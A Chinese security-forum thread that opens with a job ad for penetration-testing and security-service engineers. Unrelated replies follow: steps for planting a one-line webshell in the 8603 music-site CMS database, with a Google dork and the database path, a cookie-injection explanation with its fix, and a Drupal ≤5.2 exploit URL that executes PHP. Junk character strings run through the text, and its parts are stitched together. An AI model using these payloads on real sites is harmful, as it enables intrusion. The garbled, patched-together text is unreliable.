最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!3 M/ L8 l& a+ }
    简历投递:352113371@qq.com) H) R% W7 a* v" d% {$ f" {$ a$ c2 z

      @9 d7 \0 k+ @职位:售前工程师 2名 【7000-15000】/ S+ R- j# ^4 r
    岗位职责:$ i3 m! q5 J( c9 H/ N! N- C: U
    1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;" \0 p  R( @" u% F5 T8 D% q
    2、配合销售人员准备与用户的技术交流、PPT等技术文件;% M* d: A4 I* s8 o+ S
    3、负责信息安全咨询服务及安全服务的实施工作;
    - g' w% t+ G& n- @2 a* |* x4 f4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);: x% I/ P7 a+ _* l1 D
    5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;( H- W4 C& q& n4 B  }6 D
    任职要求:8 {) o& b7 L1 E7 D+ l; u9 D
    1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;1 T# [' i) ^9 G3 [1 B5 ?6 t; `
    2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;! G6 E- d! S1 J6 B% `$ ]; A
    3、熟悉企业IT规划的方法论和过程;
    ) Y  g% }* E% r/ R4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    / \: p3 N% _  Y% F3 |" I- p# o5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;
    2 G, @# @/ c0 D1 ?6、具有良好的客户沟通能力及技巧;3 _" V8 a$ b9 j! [  M$ D1 C
    7、能适应经常性短期出差;* A* H$ z% l  \8 b' ~
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
    : X# E! I/ G5 |
    " L; d! ?) }/ _7 c4 l+ y; Y职位:高级信息与网络安全工程师 3名 【5000-25000】
      l$ y3 k/ ^# I! S; |9 ^7 |岗位职责:& h" y) Z9 m) o0 f
        常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。( `2 @$ n! O! C; j
    任职条件:1 [$ _) b" z0 n* D) R' S
    1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。4 m3 R0 e: G% `6 p0 A
    2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
    % S8 I& m6 ^5 A7 x# `3 h3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    , J8 b- d' ~" u4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。! V4 b% h+ \% W! K

    / u' s2 Q0 e5 R+ m3 c0 M" b职位: 安全服务工程师 3名 【5000-15000】! _- j% h6 N& z$ [
    任职要求:
    $ g# F8 S" \6 F. K3 _+ P1. 能力突出者专业学历不限;* L3 D" X/ ^  U3 r7 D( T9 E
    2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;
    $ _. G: z! a' O  o0 b7 N  c7 |- |3. 熟练使用PHP、Python、Perl等任意一门编程语言;9 b, y" c) D7 Q3 {$ @
    4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;
      x% R% e6 w  V5 T" Y6 h5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;
    / I# M# E+ f3 p( y" j3 o6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。
    7 M  i0 c4 B' X0 ?. i优先考虑:
    8 k4 W( T0 p8 k" g1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低* a" d+ J2 ~5 S& d
    2.熟悉iOS & Android APP 等移动安全测试
    + W# Z2 B$ M2 `+ F/ O- i3.对智能设备、硬件安全测试有了解,熟悉相关常见协议* j% g1 P# _) x  a5 j3 C
    4.有代码审计相关经验者,具备逆向分析能力更佳;/ N+ J1 C1 R: K' e) S' ~
    5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;
    6 ]' t; c7 i$ {) v* [6.具有其它可以秒杀面试官能力- J( w' c& G, C
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    6 s" X8 B2 r3 Q! U) f
    数据库未作任何处理,可以插入一句话。继续插入经典一句话

    % y4 f2 S) L/ ], o8 P' E
    0 l& f) C. O- a
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa

    8 i* l; C! a) O* E1 E
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
    : n- x; T) C/ C- i% \( m
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。
    , B2 X1 g1 Z' _7 r, }+ |
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
    $ J& f$ ?0 C, H  b- M- p% J
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.
    ! n& y! T: Z! p8 R2 s
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注

    * o6 D5 c% M) h' i7 z' I
    入也就产生了

    ( A8 }/ v3 F2 r( {
    用注入中转。
    ) F1 P5 }! `4 m  ^8 q# C
    - N; F1 q7 k4 Z" F2 ~  m3 o! L6 y3 H

    " S; p1 l; J2 X
    + E$ X5 r$ W% [; T% e7 z/ B) d$ ]2 \3 ^1 _* l& L/ B

    7 j' ?2 y# A% i) S0 k, }& M& w" c$ B
    " W+ V& k6 N- @; [
    * n5 `* O/ ?) w' {' ~
    & y5 G4 R1 G' R0 s
    7 X2 i1 B) J' H5 m1 L# S7 a

    ' k6 \; _6 {3 [* ?, x; T) W( M4 k  X1 p+ C6 V$ N
    , S7 a$ N9 e4 P& v  {

    8 K7 E5 r# O3 i7 x% N$ Z, @
    6 W% M) I/ k9 x
    , y% c' Q2 E6 M$ c1 f0 M
    % g0 m" y# B5 a$ X2 n; b- y! a+ `6 B0 N+ l
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。* e3 ?* j& M* j$ ?; |

    " Z  o) }9 `; o% C
    2 |- n  ]8 D: k0 d* A+ R
    ) S8 v' n# {' i, k. w2 O. ]2 b9 w
    - D: J5 k% `' |+ F2 j! u5 \
    0 v8 L2 H0 {$ d9 P, P' T- D3 a/ u6 q$ i
    # r4 O$ J- m1 M5 `( E2 G3 y$ k( X% V  `4 f$ ~  J$ O
    5 ~4 h2 U' B( c4 _4 `& @

    + Z" N" H/ r. r$ Y8 d1 p& n8 ]% R
    * a6 n" m5 z' z* S# L3 q3 K/ O( U# u7 ~

    * s5 q7 {4 K$ N" Y
    1 Y3 e* V$ H0 d& r
    : T% ^2 }2 ?- w5 [0 P6 L1 D0 L9 h
    - b: i4 ?' a; g3 V' N6 Y! Y  [% c
    ! O( y% `% R, J4 H- d7 p# a5 b
    % l- T& f. T4 y: @0 _  H  L! Y) c: @
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
    , T0 u/ [6 N/ K! b1 I' o0 H1 l% d: i% R" o( R# V. k

    2 L) i& Q2 p/ V/ Y' x
    " E% X2 T( _6 y* h2 Q- c* J& q' P! o& g- E! ?1 G7 {

    5 O7 p( w) V3 n% z1 c5 y) B" h4 G2 u; w/ P" w. d

    9 \1 O4 e5 G# P: l) L9 b0 t) {5 E2 r, t, Q8 s  R, B

    0 `& x, f' d  i. Y
    : n+ ]" B2 j0 j( G" ^4 R0 V: J( N# U; R4 q1 I) E! T; V
    & P. |! u  Z: S

    5 ?( S! S' S2 D6 b: o- v9 X3 n, t: T; R2 }, O4 C' ~  U$ Z0 {5 G4 {
    4 }; e. N5 |" C! r7 a  v
    , ^( _! [/ s0 p: ]2 R, w+ k( `
    8 S- M# G. e+ L" @1 I; b7 x* h9 e
    # t; \6 b; a* e4 p: y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表